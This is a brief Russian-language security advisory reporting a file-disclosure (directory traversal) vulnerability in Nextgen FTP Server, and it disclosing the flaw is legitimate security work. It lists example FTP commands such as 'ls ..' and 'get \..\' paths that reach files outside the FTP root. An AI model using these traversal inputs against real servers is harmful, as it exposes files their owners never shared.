Программа: Nextgen FTP Server 

Уязвимость раскрытия файлов обнаружена в Nextgen FTP Server. Удаленный авторизованный пользователь может просматривать произвольные файлы на целевой системе, расположенные вне FTP root каталога. 

Пример: 

ls c:\*.*
ls ..
ls \..\
ls /../
dir c:\
dir \..\*.*
get c:\»Exist File»
get \..\»Exist File»

Оставить мнение